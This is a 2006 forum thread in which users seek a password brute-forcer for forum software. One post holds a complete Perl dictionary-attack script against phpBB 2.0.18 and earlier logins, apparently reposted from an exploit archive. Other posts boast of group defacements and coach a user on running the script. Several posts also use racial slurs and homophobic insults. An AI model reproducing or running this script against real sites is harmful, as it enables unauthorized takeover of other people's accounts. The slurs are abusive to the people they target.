Posted January 27, 200619 yr Anyone know of any good ones, one that might work on phpbb, SMF, or vbulletin?
January 27, 200619 yr LOL for phpbb. Oh boy.. have fun with that one.. It will take you a long time...
January 28, 200619 yr Author any of those... theoretically a brute forcer that works on SMF or phpbb should work on any other type of forum, as long as they are PHP.
January 28, 200619 yr There aren't really brute forcers that "work", some of them just get lucky before your IP/Proxy gets banned. (No knowledge/experience but sounds right to me.) Accessdiver anyone?
January 28, 200619 yr Don't worry.. there'll be an exploit out for 2.0.18 soon. My group is working on it, http://www.zone-h.org/en/defacements/special/filter/filter_defacer=chinahacker/ trust us?
January 28, 200619 yr Quote #!/usr/bin/perl ############################################ # Credits: Weakness and Xploit by DarkFig # Affected products: All PhpBB versions <= 2.0.18 # Type: Dictionnary attack # Solutions: None official , but many solutions are possible ;) # Note: If a line of the dictionnary file contain no data => "End of the password file" # Ps: Public after 1week lol #Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html # Team: Hackademie [] Acid_Root [] BoD [] # PS: Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^ ############################################ use IO::Socket; #--------------Utilisation--------------# if(@ARGV != 6){ print " +---------------------------------------------------------------------------------+ +------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+ +---------------------------------------------------------------------------------+ + Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> + +---------------------------------------------------------------------------------+ + <host> => The host where PhpBB is installed | [Ex: site.com] + + <path> => Path of the PhpBB board | [Ex: /forum/] + + <port> => PhpBB board port | [Default is 80] + + <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] + + <username> => Username you want to bruteforce | [Ex: MasterLamer] + + <file_result> => File you want to log activity | [Ex: results.txt] + +---------------------------------------------------------------------------------+ ";exit();} #--------------Data--------------# $host = $ARGV[0]; $path = $ARGV[1]; $full = "$host"."$path"; $port = $ARGV[2]; $pass_file = $ARGV[3]; $username = $ARGV[4]; $fileresult = $ARGV[5]; $OK = 0; $referer = "http://"."$host"."$path"."login.php?redirect="; $postit = "$path"."login.php"; #--------------Hello world-----------------# print " +---------------------------------------------------------+ + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + +---------------------------------------------------------+ [+] Username | $username [+] Dictionnary file | $pass_file [+] Attack log | $fileresult +---------------------------------------------------------+"; #--------------Password file--------------# open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n"); chomp(@passdico = <FILE>); $nligne = "0"; while ($OK ne 1) { $passwordz = "$passdico[$nligne]"; $request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; $length = length $request; if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();} #--------------Sending data--------------# $send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; print $send "POST $postit HTTP/1.1\n"; print $send "Host: $host\n"; print $send "Content-Type: application/x-www-form-urlencoded\n"; print $send "Content-Length: $length\n\n"; print $send "$request\n"; read $send, $answer, 15; close($send); #-------------Success---------------# if ($answer =~ /HTTP\/(.*?) 302/) { $OK = 1; print " [-] Trying the password "."$passwordz [+] User: $username [+] Password: $passwordz +---------------------------------------------------------+\n"; open results, ">$fileresult"; print results " +---------------------------------------------------------+ + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + +---------------------------------------------------------+ [+] PhpBB board | $full [+] Board's port | $port [+] Username | $username [+] Dictionnary file | $pass_file [+] Number of test | $nligne [+] Password found | $passwordz +---------------------------------------------------------+\n"; close(FILE);close(results);exit();} #-------------Failed-----------------# if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}} # milw0rm.com [2005-12-21] props to milw0rm
January 28, 200619 yr milw0rm.. bunch of code ripping ***gots. Quote :nigga: Quote :nigga: Quote :nigga: :nigga: :nigga:
January 28, 200619 yr Mult1 said: milw0rm.. bunch of code ripping ***gots. YOUR MOMS A CODE RIPPING COCKBLOCKING ***GOT o nvm just a troll
January 28, 200619 yr btw Dreamweaver, your signature is just the best man! I can't stop admiring it:nigga:
February 7, 200619 yr I'm not sure, i'm doing the right thing, but if i save it, as a bat file, it just says, End of password file??
February 7, 200619 yr Crus4d3r said: I'm not sure, i'm doing the right thing, but if i save it, as a bat file, it just says, End of password file?? lol, first you install perl (google perl download) then you open a nice cmd window and execute the file.
